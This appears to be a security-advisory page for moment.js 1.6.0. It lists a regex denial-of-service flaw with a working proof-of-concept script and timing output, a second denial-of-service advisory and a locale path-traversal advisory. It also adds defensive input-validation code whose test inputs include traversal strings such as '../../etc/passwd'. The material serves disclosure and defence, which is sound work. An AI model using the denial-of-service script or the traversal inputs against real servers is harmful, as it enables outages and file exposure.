Moment.js 1.6.0 was released on April 26, 2012, succeeding version 1.5.1 of April 6, 2012. Both releases keep the library's core design: date creation, manipulation and formatting through a wrapper object, without modifying the native Date prototype. The public API is unchanged in principle between the two, so the upgrade from 1.5.1 is straightforward, and the library continues to cover the common tasks of parsing, validating, adding or subtracting time, and formatting dates for display.
The package metadata shows no change in dependencies or development dependencies between the two releases: both use jshint for linting, nodeunit for tests and uglify-js for minification. Because the surface API looks unchanged, the detailed changelog on the project's GitHub repository is the place to check for the bug fixes, performance work or minor API adjustments that went into 1.6.0; small releases often fix edge cases that matter in practice. For projects already on 1.5.1, moving to 1.6.0 is likely low risk, subject to that changelog check. Note that 1.6.0 itself sits inside the affected ranges of the advisories listed below, so this upgrade addresses none of them.
All vulnerabilities affecting version 1.6.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');

// Shared loop counter: genstr() below reuses it, so after each call the outer
// loop resumes from len + 1 and COUNT advances by 10001, as in the run below.
var i;

// Build a string of len + 1 copies of chr
var genstr = function (len, chr) {
    var result = "";
    for (i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Feed moment.duration() ever longer digit strings and time each call;
// the cost grows superlinearly with the input length.
for (i = 20000; i <= 10000000; i = i + 10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1');
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str);
    var end = process.hrtime(start);
    console.log(end); // [seconds, nanoseconds]
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
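Both regular expression denial of service advisories above have the same root cause: attacker-controlled strings reach a backtracking regex parser with no bound on their length or shape. The following is an added example, not code from moment.js or from either advisory, of an input gate a server can place in front of moment.duration() and moment(): it rejects over-length input before any regex runs, then accepts only strings that match anchored patterns whose quantifiers are all bounded. The length limit, the accepted grammars and the function names are this example's own choices, and moment itself is not loaded.

```javascript
// Added example: bounded input gate for strings that will be handed to moment.duration()
// and moment(). Not moment.js code. MAX_INPUT_LENGTH and the accepted grammars are assumptions.

const MAX_INPUT_LENGTH = 64; // no legitimate duration or timestamp we accept is longer than this

// Every quantifier below is bounded and each group ends in a literal that the
// preceding digits cannot match, so a mismatch backtracks a fixed number of times
// instead of a number that grows with the input.
const NUM = '\\d{1,9}(?:[.,]\\d{1,9})?';
const ISO_DURATION = new RegExp(
  `^-?P(?:${NUM}Y)?(?:${NUM}M)?(?:${NUM}W)?(?:${NUM}D)?` +
  `(?:T(?:${NUM}H)?(?:${NUM}M)?(?:${NUM}S)?)?$`
);
// "[d.]hh:mm[:ss[.fff]]" style durations, also accepted by moment.duration()
const CLOCK_DURATION = /^-?(?:\d{1,7}[. ])?\d{1,2}:\d{2}(?::\d{2}(?:\.\d{1,7})?)?$/;
// ISO 8601 calendar date with optional time and zone, for moment(string)
const ISO_DATE = /^\d{4}-\d{2}-\d{2}(?:[T ]\d{2}:\d{2}(?::\d{2}(?:\.\d{1,9})?)?(?:Z|[+-]\d{2}:?\d{2})?)?$/;

// Returns the trimmed string if it passes, otherwise null. The length check runs
// first so that a 100 000-character payload is rejected in O(1) without touching a regex.
function gate(input, patterns, maxLen = MAX_INPUT_LENGTH) {
  if (typeof input !== 'string' || input.length > maxLen) return null;
  const s = input.trim();
  return patterns.some((re) => re.test(s)) ? s : null;
}

function safeDurationInput(input) {
  const s = gate(input, [ISO_DURATION, CLOCK_DURATION]);
  // "P" or "PT" match the ISO grammar but carry no value; reject them as well
  return s !== null && /\d/.test(s) ? s : null;
}

function safeDateInput(input) {
  return gate(input, [ISO_DATE]);
}

// Wall-clock cost of the gate on one input, in milliseconds
function gateCostMs(fn, input) {
  const start = process.hrtime.bigint();
  fn(input);
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Intended use on a server (moment is not loaded in this example):
//   const d = safeDurationInput(req.query.d);
//   if (d === null) return res.status(400).end();
//   const dur = moment.duration(d);

// Constructed inputs: the advisory's payload shape next to legitimate values
const samples = [
  'P1Y2M3DT4H5M6S', 'PT36H', '1.02:03:04', '02:30', 'P',
  '-' + '1'.repeat(100000), '2012-04-26T10:00:00Z', '2012-04-26', 'not a date',
];
for (const s of samples) {
  const label = s.length > 40 ? `${s.slice(0, 12)}... (${s.length} chars)` : s;
  console.log(label.padEnd(32), 'duration:', safeDurationInput(s), 'date:', safeDateInput(s),
    `${gateCostMs(safeDurationInput, s).toFixed(3)} ms`);
}
```

The gate does not replace the library upgrade: it only guarantees that whatever regex the library runs sees a short, well-formed string, which keeps the worst case bounded even on a version whose parser is still vulnerable.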
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability affects npm (server-side) users of moment.js, especially where a user-provided locale string (e.g. fr) is passed directly to moment.locale() to switch locales.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize (ideally allow-list) user-provided locale names before passing them to moment.js.
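One way to apply that workaround, as an added example that is not moment.js's own code: normalise the requested name, reject anything that is not shaped like a language tag (which excludes every dot, slash and backslash), and then hand moment.locale() only a value taken from your own list of bundled locales. The supported-locale list, the default locale and the shape regex are assumptions a deployment would replace with its own.

```javascript
// Added example: resolving a user-supplied locale name before it reaches moment.locale().
// Not moment.js code. SUPPORTED_LOCALES, DEFAULT_LOCALE and LOCALE_SHAPE are assumptions.

const SUPPORTED_LOCALES = ['en', 'en-gb', 'fr', 'fr-ca', 'de', 'es', 'ja', 'pt-br', 'zh-cn'];
const DEFAULT_LOCALE = 'en';

// Language tag shape: 2-3 letter language, then up to three short alphanumeric subtags.
// Dots, slashes and backslashes can never match, so "../" style names fail here
// even before the allow-list check.
const LOCALE_SHAPE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8}){0,3}$/;

// Returns { locale, accepted, exact }. `locale` is always equal to an element of
// `supported` (or the fallback), never the caller's raw bytes, so whatever moment
// does with the name internally only ever sees one of our own constants.
function resolveLocale(requested, supported = SUPPORTED_LOCALES, fallback = DEFAULT_LOCALE) {
  const rejected = { locale: fallback, accepted: false, exact: false };
  if (typeof requested !== 'string' || requested.length > 35) return rejected;
  // moment lower-cases locale keys; "fr_CA" and "fr-CA" should both map to "fr-ca"
  const name = requested.trim().toLowerCase().replace(/_/g, '-');
  if (!LOCALE_SHAPE.test(name)) return rejected;
  if (supported.includes(name)) return { locale: name, accepted: true, exact: true };
  // Downgrade "fr-be" to "fr" when only the language part is bundled
  const language = name.split('-')[0];
  if (supported.includes(language)) return { locale: language, accepted: true, exact: false };
  return rejected;
}

// Intended use on a server (moment is not loaded in this example):
//   moment.locale(resolveLocale(req.query.lang).locale);

// Constructed requests: legitimate tags next to traversal attempts
const requests = ['fr', 'FR_CA', 'fr-be', '../../etc/passwd', 'de/../../../package.json',
  'en\\..\\..\\x', 'a'.repeat(200), null];
for (const r of requests) {
  console.log(String(r).slice(0, 30).padEnd(30), '->', JSON.stringify(resolveLocale(r)));
}
```

Keeping the allow-list check even though the shape regex already blocks traversal characters means the application never depends on how a particular moment version builds its internal file path; an unknown but well-formed tag simply falls back to the default.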